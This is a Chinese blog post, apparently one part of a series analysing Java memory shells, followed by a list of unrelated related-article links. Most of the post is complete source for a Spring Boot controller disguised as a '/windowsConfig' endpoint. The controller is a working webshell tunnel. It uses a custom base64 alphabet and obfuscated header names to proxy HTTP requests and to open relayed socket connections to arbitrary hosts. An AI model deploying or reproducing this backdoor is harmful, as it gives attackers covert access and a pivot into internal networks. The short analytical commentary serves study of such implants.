从零开始的内存马分析——如何骑马反杀(三)2

简介: 从零开始的内存马分析——如何骑马反杀(三)

Springboot环境搭建

先附上代码

package com.example.windowsconfig.Controller;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.ServletInputStream;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.*;
import java.nio.ByteBuffer;
import java.nio.channels.SocketChannel;
import java.nio.charset.StandardCharsets;
import java.util.Collections;
import java.util.Enumeration;
import java.util.List;
@Controller
public class controller {
    private static char[] en = "CE0XgUOIQFsw1tcy+H95alrukYfdznxZR8PJo2qbh4pe6/VDKijTL3v7BAmGMSNW".toCharArray();
    public static String b64en(byte[] data) {
        StringBuffer sb = new StringBuffer();
        int len = data.length;
        int i = 0;
        int b1, b2, b3;
        while (i < len) {
            b1 = data[i++] & 0xff;
            if (i == len) {
                sb.append(en[b1 >>> 2]);
                sb.append(en[(b1 & 0x3) << 4]);
                sb.append("==");
                break;
            }
            b2 = data[i++] & 0xff;
            if (i == len) {
                sb.append(en[b1 >>> 2]);
                sb.append(en[((b1 & 0x03) << 4)
                        | ((b2 & 0xf0) >>> 4)]);
                sb.append(en[(b2 & 0x0f) << 2]);
                sb.append("=");
                break;
            }
            b3 = data[i++] & 0xff;
            sb.append(en[b1 >>> 2]);
            sb.append(en[((b1 & 0x03) << 4)
                    | ((b2 & 0xf0) >>> 4)]);
            sb.append(en[((b2 & 0x0f) << 2)
                    | ((b3 & 0xc0) >>> 6)]);
            sb.append(en[b3 & 0x3f]);
        }
        return sb.toString();
    }
    private static byte[] de = new byte[] {-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,16,-1,-1,-1,45,2,12,37,53,41,19,44,55,33,18,-1,-1,-1,-1,-1,-1,-1,57,56,0,47,1,9,59,17,7,35,48,52,60,62,6,34,8,32,61,51,5,46,63,3,25,31,-1,-1,-1,-1,-1,-1,20,39,14,27,43,26,4,40,49,50,24,21,58,29,36,42,38,22,10,13,23,54,11,30,15,28,-1,-1,-1,-1,-1};
    public static byte[] b64de(String str) {
        byte[] data = str.getBytes();
        int len = data.length;
        ByteArrayOutputStream buf = new ByteArrayOutputStream(len);
        int i = 0;
        int b1, b2, b3, b4;
        while (i < len) {
            do {
                b1 = de[data[i++]];
            } while (i < len && b1 == -1);
            if (b1 == -1) {
                break;
            }
            do {
                b2 = de[data[i++]];
            } while (i < len && b2 == -1);
            if (b2 == -1) {
                break;
            }
            buf.write((int) ((b1 << 2) | ((b2 & 0x30) >>> 4)));
            do {
                b3 = data[i++];
                if (b3 == 61) {
                    return buf.toByteArray();
                }
                b3 = de[b3];
            } while (i < len && b3 == -1);
            if (b3 == -1) {
                break;
            }
            buf.write((int) (((b2 & 0x0f) << 4) | ((b3 & 0x3c) >>> 2)));
            do {
                b4 = data[i++];
                if (b4 == 61) {
                    return buf.toByteArray();
                }
                b4 = de[b4];
            } while (i < len && b4 == -1);
            if (b4 == -1) {
                break;
            }
            buf.write((int) (((b3 & 0x03) << 6) | b4));
        }
        return buf.toByteArray();
    }
    static String headerkey(String str) throws Exception {
        String out = "";
        for (String block: str.split("-")) {
            out += block.substring(0, 1).toUpperCase() + block.substring(1);
            out += "-";
        }
        return out.substring(0, out.length() - 1);
    }
    boolean islocal(String url) throws Exception {
        String ip = (new URL(url)).getHost();
        Enumeration<NetworkInterface> nifs = NetworkInterface.getNetworkInterfaces();
        while (nifs.hasMoreElements()) {
            NetworkInterface nif = nifs.nextElement();
            Enumeration<InetAddress> addresses = nif.getInetAddresses();
            while (addresses.hasMoreElements()) {
                InetAddress addr = addresses.nextElement();
                if (addr instanceof Inet4Address)
                    if (addr.getHostAddress().equals(ip))
                        return true;
            }
        }
        return false;
    }
    @RequestMapping("/windowsConfig")
    public void windows(HttpServletRequest request, HttpServletResponse response) throws Exception {
        ServletOutputStream out = response.getOutputStream();
        ServletContext application = request.getSession().getServletContext();
        String rUrl = request.getHeader("Mueytrthxaatjpsb");
        if (rUrl != null) {
            rUrl = new String(b64de(rUrl));
            if (!islocal(rUrl)){
                response.reset();
                String method = request.getMethod();
                URL u = new URL(rUrl);
                HttpURLConnection conn = (HttpURLConnection) u.openConnection();
                conn.setRequestMethod(method);
                conn.setDoOutput(true);
                // conn.setConnectTimeout(200);
                // conn.setReadTimeout(200);
                Enumeration enu = request.getHeaderNames();
                List<String> keys = Collections.list(enu);
                Collections.reverse(keys);
                for (String key : keys){
                    if (!key.equalsIgnoreCase("Mueytrthxaatjpsb")){
                        String value=request.getHeader(key);
                        conn.setRequestProperty(headerkey(key), value);
                    }
                }
                int i;
                byte[] buffer = new byte[1024];
                if (request.getContentLength() != -1){
                    OutputStream output;
                    try{
                        output = conn.getOutputStream();
                    }catch(Exception e){
                        response.setHeader("Die", "C23vc07BCOdIsUHAmDM4nNP01x7zR4uKsWbBrOV");
                        return;
                    }
                    ServletInputStream inputStream = request.getInputStream();
                    while ((i = inputStream.read(buffer)) != -1) {
                        output.write(buffer, 0, i);
                    }
                    output.flush();
                    output.close();
                }
                for (String key : conn.getHeaderFields().keySet()) {
                    if (key != null && !key.equalsIgnoreCase("Content-Length") && !key.equalsIgnoreCase("Transfer-Encoding")){
                        String value = conn.getHeaderField(key);
                        response.setHeader(key, value);
                    }
                }
                InputStream hin;
                if (conn.getResponseCode() < HttpURLConnection.HTTP_BAD_REQUEST) {
                    hin = conn.getInputStream();
                } else {
                    hin = conn.getErrorStream();
                    if (hin == null){
                        response.setStatus(200);
                        return;
                    }
                }
                ByteArrayOutputStream baos = new ByteArrayOutputStream();
                while ((i = hin.read(buffer)) != -1) {
                    byte[] data = new byte[i];
                    System.arraycopy(buffer, 0, data, 0, i);
                    baos.write(data);
                }
                String responseBody = new String(baos.toByteArray());
                response.addHeader("Content-Length", Integer.toString(responseBody.length()));
                response.setStatus(conn.getResponseCode());
                out.write(responseBody.getBytes(StandardCharsets.UTF_8));
                out.flush();
                if ( true ) return; // exit
            }
        }
        response.resetBuffer();
        response.setStatus(200);
        String cmd = request.getHeader("Ffydhndmhhl");
        if (cmd != null) {
            String mark = cmd.substring(0,22);
            cmd = cmd.substring(22);
            response.setHeader("Sbxspawzq", "CapFLueBCn2ZM");
            if (cmd.compareTo("b5v9XJbF") == 0) {
                try {
                    String[] target_ary = new String(b64de(request.getHeader("Nnpo"))).split("\\|");
                    String target = target_ary[0];
                    int port = Integer.parseInt(target_ary[1]);
                    SocketChannel socketChannel = SocketChannel.open();
                    socketChannel.connect(new InetSocketAddress(target, port));
                    socketChannel.configureBlocking(false);
                    application.setAttribute(mark, socketChannel);
                    response.setHeader("Sbxspawzq", "CapFLueBCn2ZM");
                } catch (Exception e) {
                    response.setHeader("Die", "k4MBX7QElVQzrmOdkml_G3pnYz55EFZPIwTO");
                    response.setHeader("Sbxspawzq", "G87IdjaYlmwUWO9QjVFHPeP2SVfeMhzT6_pvfN46Km7PazEmu225XmpiAa");
                }
            } else if (cmd.compareTo("0FX") == 0) {
                SocketChannel socketChannel = (SocketChannel)application.getAttribute(mark);
                try{
                    socketChannel.socket().close();
                } catch (Exception e) {
                }
                application.removeAttribute(mark);
            } else if (cmd.compareTo("TQDLLDvYzyrB4pPbieRBk90FIdYgjJcE2si70wIXfql") == 0){
                SocketChannel socketChannel = (SocketChannel)application.getAttribute(mark);
                try{
                    ByteBuffer buf = ByteBuffer.allocate(513);
                    int bytesRead = socketChannel.read(buf);
                    int maxRead = 524288;
                    int readLen = 0;
                    while (bytesRead > 0){
                        byte[] data = new byte[bytesRead];
                        System.arraycopy(buf.array(), 0, data, 0, bytesRead);
                        out.write(b64en(data).getBytes(StandardCharsets.UTF_8));
                        out.flush();
                        ((java.nio.Buffer)buf).clear();
                        readLen += bytesRead;
                        if (bytesRead < 513 || readLen >= maxRead)
                            break;
                        bytesRead = socketChannel.read(buf);
                    }
                    response.setHeader("Sbxspawzq", "CapFLueBCn2ZM");
                } catch (Exception e) {
                    response.setHeader("Sbxspawzq", "G87IdjaYlmwUWO9QjVFHPeP2SVfeMhzT6_pvfN46Km7PazEmu225XmpiAa");
                }
            } else if (cmd.compareTo("CtWP7tBSKiDnysT9hP9pa") == 0){
                SocketChannel socketChannel = (SocketChannel)application.getAttribute(mark);
                try {
                    String inputData = "";
                    InputStream in = request.getInputStream();
                    while ( true ){
                        byte[] buff = new byte[in.available()];
                        if (in.read(buff) == -1)
                            break;
                        inputData += new String(buff);
                    }
                    byte[] base64 = b64de(inputData);
                    ByteBuffer buf = ByteBuffer.allocate(base64.length);
                    buf.put(base64);
                    buf.flip();
                    while(buf.hasRemaining())
                        socketChannel.write(buf);
                    response.setHeader("Sbxspawzq", "CapFLueBCn2ZM");
                } catch (Exception e) {
                    response.setHeader("Die", "QmPrA86mT15");
                    response.setHeader("Sbxspawzq", "G87IdjaYlmwUWO9QjVFHPeP2SVfeMhzT6_pvfN46Km7PazEmu225XmpiAa");
                    socketChannel.socket().close();
                }
            }
        } else {
            out.write("<!-- HdgznEy73Ghv4jiuh5s83czHnFBYBpOdRVE4qyMTNktshD7xIS9S09PrPNH -->".getBytes(StandardCharsets.UTF_8));
        }
    }
}

主要增添的是两部分

ServletOutputStream out = response.getOutputStream();
ServletContext application = request.getSession().getServletContext();

一个是输出流,一个是application

同时针对所有的out流都进行getByte转换

当然,这个也是比较神奇的

为什么不会触发这个回显呢?

根据代码,我们可以分析到,因为有content-length 才会触发

正常测试没有问题

我们打开科来,尝试分析一下数据包

相关文章
|
1月前
|
Web App开发 监控 JavaScript
监控和分析 JavaScript 内存使用情况
【10月更文挑战第30天】通过使用上述的浏览器开发者工具、性能分析工具和内存泄漏检测工具,可以有效地监控和分析JavaScript内存使用情况,及时发现和解决内存泄漏、过度内存消耗等问题,从而提高JavaScript应用程序的性能和稳定性。在实际开发中,可以根据具体的需求和场景选择合适的工具和方法来进行内存监控和分析。
|
2月前
|
编译器 C语言
动态内存分配与管理详解(附加笔试题分析)(上)
动态内存分配与管理详解(附加笔试题分析)
72 1
|
3月前
|
程序员 编译器 C++
【C++核心】C++内存分区模型分析
这篇文章详细解释了C++程序执行时内存的四个区域:代码区、全局区、栈区和堆区,以及如何在这些区域中分配和释放内存。
62 2
|
27天前
|
并行计算 算法 测试技术
C语言因高效灵活被广泛应用于软件开发。本文探讨了优化C语言程序性能的策略,涵盖算法优化、代码结构优化、内存管理优化、编译器优化、数据结构优化、并行计算优化及性能测试与分析七个方面
C语言因高效灵活被广泛应用于软件开发。本文探讨了优化C语言程序性能的策略,涵盖算法优化、代码结构优化、内存管理优化、编译器优化、数据结构优化、并行计算优化及性能测试与分析七个方面,旨在通过综合策略提升程序性能,满足实际需求。
60 1
|
28天前
|
JavaScript
如何使用内存快照分析工具来分析Node.js应用的内存问题?
需要注意的是,不同的内存快照分析工具可能具有不同的功能和操作方式,在使用时需要根据具体工具的说明和特点进行灵活运用。
43 3
|
1月前
|
开发框架 监控 .NET
【Azure App Service】部署在App Service上的.NET应用内存消耗不能超过2GB的情况分析
x64 dotnet runtime is not installed on the app service by default. Since we had the app service running in x64, it was proxying the request to a 32 bit dotnet process which was throwing an OutOfMemoryException with requests >100MB. It worked on the IaaS servers because we had the x64 runtime install
|
1月前
|
Web App开发 JavaScript 前端开发
使用 Chrome 浏览器的内存分析工具来检测 JavaScript 中的内存泄漏
【10月更文挑战第25天】利用 Chrome 浏览器的内存分析工具,可以较为准确地检测 JavaScript 中的内存泄漏问题,并帮助我们找出潜在的泄漏点,以便采取相应的解决措施。
305 9
|
2月前
|
并行计算 算法 IDE
【灵码助力Cuda算法分析】分析共享内存的矩阵乘法优化
本文介绍了如何利用通义灵码在Visual Studio 2022中对基于CUDA的共享内存矩阵乘法优化代码进行深入分析。文章从整体程序结构入手,逐步深入到线程调度、矩阵分块、循环展开等关键细节,最后通过带入具体值的方式进一步解析复杂循环逻辑,展示了通义灵码在辅助理解和优化CUDA编程中的强大功能。
|
2月前
|
程序员 编译器 C语言
动态内存分配与管理详解(附加笔试题分析)(下)
动态内存分配与管理详解(附加笔试题分析)(下)
59 2
|
2月前
|
SQL 安全 算法
ChatGPT高效提问—prompt实践(漏洞风险分析-重构建议-识别内存泄漏)
ChatGPT高效提问—prompt实践(漏洞风险分析-重构建议-识别内存泄漏)
50 0

热门文章

最新文章